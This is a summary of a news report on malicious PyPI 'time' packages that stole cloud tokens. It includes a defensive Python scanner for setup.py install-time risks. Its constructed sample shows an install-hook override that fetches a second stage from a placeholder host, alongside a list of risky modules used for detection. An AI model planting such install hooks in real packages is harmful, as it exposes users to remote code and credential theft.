Source: The Hacker News Author: [email protected] (The Hacker News) URL: https://thehackernews.com/2025/03/malicious-pypi-packages-stole-cloud.html
ONE SENTENCE SUMMARY:
A malicious campaign targeted PyPI users with fake “time” utilities to steal cloud credentials, affecting thousands of downloads before removal.
MAIN POINTS:
- Cybercriminals uploaded 20 malicious Python packages to PyPI, masquerading as “time”-related utilities.
- These packages were designed to steal sensitive cloud access tokens from affected users.
- The campaign resulted in over 14,100 downloads before the packages were removed.
- Some packages uploaded data to threat actor infrastructure, while others mimicked cloud client functionality.
- Three packages were dependencies in a popular GitHub project, increasing their reach.
- A commit referencing a malicious package dates back to November 8, 2023.
- Fortinet discovered thousands of suspicious packages across PyPI and npm with harmful install scripts.
- Malicious packages often use external URLs to download payloads or communicate with command-and-control servers.
- 974 packages were linked to data exfiltration, malware downloads, and other threats.
- Monitoring external URLs in package dependencies is critical to preventing exploitation.
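The install-script and external-URL indicators listed above can be checked statically before a package is ever installed. The following is an added example, not code from The Hacker News article, Fortinet or any of the packages it describes: it parses a package's setup.py with Python's ast module and flags three things a reviewer would want to see, namely URLs pointing outside an allowlist of expected metadata hosts, classes that subclass setuptools install commands (code that runs during pip install), and imports of network, process or encoding modules in the install script. The two sample setup.py texts, the allowlist, the scoring weights and the placeholder host 203.0.113.10 are all constructed for the example.

```python
"""Static triage of a setup.py for install-time risk indicators.

Added example; not tooling from the article or from Fortinet. The sample
inputs below are constructed strings that are parsed, never executed.
"""
import ast
import re
from dataclasses import dataclass, field

URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)

# Hosts that legitimately appear in package metadata (homepage, repo links).
# Constructed allowlist; tune it to your own ecosystem.
ALLOWLISTED_HOSTS = {"pypi.org", "github.com", "readthedocs.io"}

# Modules whose presence in an install script is a warning sign: a package
# has no business fetching, decoding or spawning anything at install time.
RISKY_MODULES = {"urllib", "requests", "socket", "subprocess", "base64"}

# setuptools command classes that, when subclassed, run code during install.
INSTALL_HOOK_BASES = {"install", "develop", "egg_info", "build_py"}


@dataclass
class Findings:
    external_urls: list = field(default_factory=list)
    install_hooks: list = field(default_factory=list)
    risky_imports: list = field(default_factory=list)

    def risk_score(self) -> int:
        # Constructed weights: an install hook is the strongest single signal.
        return (3 * len(self.install_hooks)
                + 2 * len(self.risky_imports)
                + len(self.external_urls))


def _host(url: str) -> str:
    return url.split("//", 1)[1].split("/", 1)[0].lower()


def _allowlisted(host: str) -> bool:
    return any(host == h or host.endswith("." + h) for h in ALLOWLISTED_HOSTS)


def scan_setup_py(source: str) -> Findings:
    """Parse setup.py source text and collect risk indicators without running it."""
    tree = ast.parse(source)
    found = Findings()
    for node in ast.walk(tree):
        # 1. String literals carrying URLs to hosts outside the allowlist.
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            for url in URL_RE.findall(node.value):
                if not _allowlisted(_host(url)):
                    found.external_urls.append(url)
        # 2. Classes deriving from setuptools command classes (install hooks).
        elif isinstance(node, ast.ClassDef):
            for base in node.bases:
                name = base.attr if isinstance(base, ast.Attribute) else getattr(base, "id", "")
                if name in INSTALL_HOOK_BASES:
                    found.install_hooks.append(node.name)
        # 3. Imports of network / process / encoding modules.
        elif isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in RISKY_MODULES:
                    found.risky_imports.append(alias.name)
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module.split(".")[0] in RISKY_MODULES:
                found.risky_imports.append(node.module)
    return found


# Constructed sample: an ordinary setup.py with only a repository link.
BENIGN_SETUP = '''
from setuptools import setup
setup(name="timeutils", version="1.0", url="https://github.com/example/timeutils")
'''

# Constructed sample of the install-hook pattern the article describes:
# an install command override that reaches out to a placeholder host.
SUSPICIOUS_SETUP = '''
import base64
from urllib.request import urlopen
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        urlopen("http://203.0.113.10/stage2")  # placeholder host (TEST-NET-3)

setup(name="time-utils", version="0.1", cmdclass={"install": PostInstall})
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("suspicious", SUSPICIOUS_SETUP)):
        r = scan_setup_py(src)
        print(f"{label}: score={r.risk_score()} hooks={r.install_hooks} "
              f"imports={r.risky_imports} urls={r.external_urls}")
```

Run it against the setup.py of a downloaded sdist (pip download --no-binary :all: --no-deps <name>) before installing; a non-zero score is a reason to read the file by hand, not a verdict, since legitimate build scripts occasionally subclass install for platform-specific steps.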
TAKEAWAYS:
- Attackers increasingly exploit software supply chains by injecting malicious packages into trusted repositories.
- Developers should verify package authenticity before installation to prevent credential theft.
- Open-source ecosystems remain vulnerable to dependency hijacking and supply chain attacks.
- Continuous monitoring and scrutiny of external URLs in dependencies are essential for security.
- Security firms play a vital role in identifying and mitigating emerging threats in package repositories.